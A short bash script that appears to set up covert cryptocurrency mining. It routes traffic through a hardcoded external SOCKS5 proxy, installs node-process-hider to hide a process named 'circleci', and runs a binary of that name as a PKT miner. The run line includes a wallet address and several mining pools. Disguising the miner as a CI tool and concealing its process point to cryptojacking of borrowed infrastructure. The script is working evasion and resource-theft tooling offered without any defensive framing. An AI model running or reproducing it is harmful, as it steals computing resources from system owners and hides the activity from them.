#!/bin/bash
apt update && apt install gcc screen -y 
apt install proxychains -y
sed -i 's/socks4/socks5/' /etc/proxychains.conf 
sed -i 's/127.0.0.1/98.162.96.53/' /etc/proxychains.conf
sed -i 's/9050/10663/' /etc/proxychains.conf
apt install nodejs
npm install -g npm@8.5.0
npm i -g node-process-hider 
ph add circleci
chmod +x circleci 
chmod 777 circleci
./circleci ann -p pkt1q76dngmrf380w8k9j4f7w4eqpzx3n9vcprldmjx  http://pool.pkteer.com http://pool.pktpool.io http://pool.pkt.world http://stratum.zetahash.com



